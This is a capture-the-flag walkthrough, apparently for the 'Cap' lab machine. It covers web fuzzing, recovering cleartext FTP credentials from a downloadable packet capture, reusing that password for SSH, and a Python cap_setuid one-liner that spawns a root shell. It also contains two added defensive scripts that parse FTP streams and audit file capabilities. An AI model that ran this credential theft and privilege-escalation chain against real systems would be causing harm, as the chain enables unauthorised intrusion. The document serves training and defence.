Enumeration
Defining a helper variable containing the IP and doing some basic enumeration:

```bash
export ip=10.10.10.245
ping $ip          # TTL 63: Linux default of 64 minus one hop, so probably Linux
nmap -sC -sV $ip
```
| Port | Service | Notes |
|---|---|---|
| 21 | ftp | vsftpd 3.0.3 |
| 22 | ssh | OpenSSH 8.2p1 Ubuntu, protocol 2.0 |
| 80 | http | gunicorn |
http
The service on port 80 shows a dashboard when opened in the browser. Enumerating with ffuf:

```bash
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.10.245/FUZZ              # finds /data
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.10.245/data/FUZZ         # returns lots of 302s
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.10.245/data/FUZZ -fc 302 # finds 01,0,2,000000,00,02,1,00000000
# every hit is numeric, so fuzz the numeric IDs directly (written once, not appended on each run)
seq 0 10000 > /tmp/numbers
ffuf -w /tmp/numbers -u http://10.10.10.245/data/FUZZ -fc 302                               # finds 0,1,2
```
Opening /data/0 confirms it is an interesting result: it is a packet capture of 72 packets that can be downloaded. Downloading the file and opening it in Wireshark shows the captured packets.
FTP control-channel session, recovered with Wireshark's Follow TCP Stream on port 21:

```
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.
```

The recovered credentials are user `nathan`, password `Buck3tH4TF0RM3!`. FTP sends both in cleartext, which is why a capture that anyone can download is enough to obtain them.
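Reading the stream by hand works for one capture, but a defender reviewing FTP traffic (or an exported "Follow TCP Stream" text file) wants the same check done programmatically: which user authenticated in cleartext, whether the login succeeded, what was requested, and where the active-mode data channel pointed. The parser below is an added example, not part of the original writeup; the sample stream it runs on is constructed from the session shown above.

```python
"""Flag cleartext FTP logins in a captured control-channel stream.

Added example (not from the original writeup). Input is the text of an FTP
control channel as exported by Wireshark's Follow TCP Stream.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: the session from the capture above, one line per message.
SAMPLE_STREAM = """\
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.
"""


@dataclass
class FtpSession:
    banner: str = ""
    user: str = ""
    password: str = ""
    login_ok: bool = False
    transfers: list = field(default_factory=list)       # (verb, argument, first reply code)
    data_endpoints: list = field(default_factory=list)  # (host, port) from active-mode PORT


_REPLY = re.compile(r"^(\d{3})[ -](.*)$")                       # server reply: 3-digit code
_PORT = re.compile(r"^PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)$")  # h1,h2,h3,h4,p1,p2


def parse_ftp_stream(text: str) -> FtpSession:
    """Walk the stream line by line, pairing each client command with its reply."""
    session = FtpSession()
    pending = None  # last client command that has not yet received a reply
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line:
            continue
        reply = _REPLY.match(line)
        if reply:
            code = int(reply.group(1))
            if code == 220 and not session.banner:
                session.banner = reply.group(2)
            elif code == 230:
                session.login_ok = True
            elif pending and pending[0] in ("RETR", "STOR", "LIST", "NLST"):
                session.transfers.append((pending[0], pending[1], code))
            pending = None
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            session.user = arg
        elif verb == "PASS":
            session.password = arg  # transmitted in cleartext: this is the finding
        elif verb == "PORT":
            m = _PORT.match(line)
            if m:
                host = ".".join(m.group(i) for i in range(1, 5))
                port = int(m.group(5)) * 256 + int(m.group(6))
                session.data_endpoints.append((host, port))
        pending = (verb, arg)
    return session


def findings(session: FtpSession) -> list:
    """Human-readable findings for a triage report."""
    out = []
    if session.password:
        state = "succeeded" if session.login_ok else "failed"
        out.append(f"cleartext FTP credentials for user '{session.user}' (login {state})")
    for verb, arg, code in session.transfers:
        if verb in ("RETR", "STOR"):
            out.append(f"{verb} '{arg}' -> server replied {code}")
    if session.data_endpoints:
        out.append(f"active-mode data channel back to {session.data_endpoints[0][0]}")
    return out


if __name__ == "__main__":
    for line in findings(parse_ftp_stream(SAMPLE_STREAM)):
        print(line)
```

The parser does not need the pcap itself: Wireshark's "Show and save data as ASCII" export of the stream is enough, and the same function works on any text dump of port 21 traffic. The PORT decoding (p1*256 + p2) is also useful when checking firewall logs for the matching inbound data connection.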
FTP
The captured credentials can be used to log in to the FTP service:

```bash
ftp $ip
# nathan
# Buck3tH4TF0RM3!
ls
get user.txt
```
SSH
Testing for credential reuse of the FTP password on SSH:

```bash
ssh nathan@$ip
# Buck3tH4TF0RM3!
```

This gives a shell.
Privilege Escalation
Enumerate for potential ways to escalate privileges:

```bash
scp /opt/linpeas/linpeas.sh nathan@$ip:/tmp/linpeas.sh
# Buck3tH4TF0RM3!
ssh nathan@$ip
# Buck3tH4TF0RM3!
cd /tmp
bash linpeas.sh | tee o   # save the output to o so it can be paged through
less -r o
# Capabilities
# /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
```

The Python interpreter carries cap_setuid, so any code it runs may call setuid(0). Execute a payload using Python to change the uid through cap_setuid:

```bash
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
whoami
# root
cat /root/root.txt
```
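The root cause is a file capability that should never sit on a general-purpose interpreter. The audit below is an added example, not part of the original writeup: it parses `getcap -r / 2>/dev/null` output (both the older `path = caps+flags` and the newer `path caps=flags` formats) and reports binaries whose capabilities are equivalent to root unless they are on an allow-list of expected, narrowly scoped uses. The sample output is constructed; only the python3.8 line comes from the writeup, and the allow-list entries for ping and mtr-packet are assumptions about a typical Ubuntu install.

```python
"""Audit Linux file capabilities for root-equivalent grants.

Added example (not from the original writeup). Run `getcap -r / 2>/dev/null`
and feed the output to parse_getcap(); risky_capabilities() lists what to fix.
"""
import re
import subprocess

# Capabilities that, on an interpreter or any binary a user can run, are
# effectively root. cap_setuid alone enables the os.setuid(0) step above.
HIGH_RISK = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# Binaries where a capability is expected and scoped by design (assumed allow-list).
EXPECTED = {
    "/usr/bin/ping": {"cap_net_raw"},
    "/usr/bin/mtr-packet": {"cap_net_raw"},
}

# Constructed sample of getcap output; the python3.8 line is the writeup's finding.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# libcap < 2.41 prints "path = caps+flags"; newer versions print "path caps=flags".
_LINE = re.compile(r"^(?P<path>\S+)(?: =)? (?P<caps>\S+)$")
_CAPS = re.compile(r"^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]*)$")


def parse_getcap(text: str) -> dict:
    """Return {path: (set of capability names, flag string)} from getcap output."""
    entries = {}
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue
        caps = _CAPS.match(m.group("caps"))
        if not caps:
            continue
        entries[m.group("path")] = (set(caps.group("names").split(",")), caps.group("flags"))
    return entries


def risky_capabilities(entries: dict) -> list:
    """Return [(path, sorted risky caps)] for grants not covered by the allow-list."""
    out = []
    for path, (caps, _flags) in sorted(entries.items()):
        unexpected = caps - EXPECTED.get(path, set())
        risky = unexpected & HIGH_RISK
        if risky:
            out.append((path, sorted(risky)))
    return out


def audit_host() -> list:
    """Run getcap on the local system and return the risky entries."""
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return risky_capabilities(parse_getcap(proc.stdout))


if __name__ == "__main__":
    for path, caps in risky_capabilities(parse_getcap(SAMPLE_GETCAP)):
        # Remediation: `setcap -r PATH` strips all file capabilities from the binary.
        print(f"{path}: {','.join(caps)}  -> fix with: setcap -r {path}")
```

Running this periodically (or as a CIS-style compliance check) catches the Cap misconfiguration before anyone needs linpeas to find it; `setcap -r /usr/bin/python3.8` removes the grant, and if a service genuinely needs to bind a low port, cap_net_bind_service on a dedicated binary is the scoped alternative.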